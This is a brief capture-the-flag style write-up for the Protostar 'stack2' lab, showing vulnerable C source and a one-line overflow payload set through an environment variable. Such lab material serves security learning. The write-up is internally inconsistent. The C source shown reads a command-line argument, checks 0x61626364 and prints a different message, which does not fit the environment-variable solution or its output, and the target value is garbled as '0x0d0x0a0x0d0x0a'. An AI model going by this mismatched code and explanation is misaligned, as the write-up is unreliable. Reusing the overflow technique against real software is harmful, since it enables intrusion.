Protostar vm, stack2

protostar

Here is the source of the vulnerable program :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

The goal here is to overflow the buffer through an environement variable. This time the value of modified has to be 0x0d0x0a0x0d0x0a.

Since the ascii representation of 0xa and 0x0d are the line feed and the carriage return, we’ll use the ‘\x’ notation

Here’s the solution :

1
2
3
user@protostar:/opt/protostar/bin$ export GREENIE=`python -c 'print 64*"A"+"\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable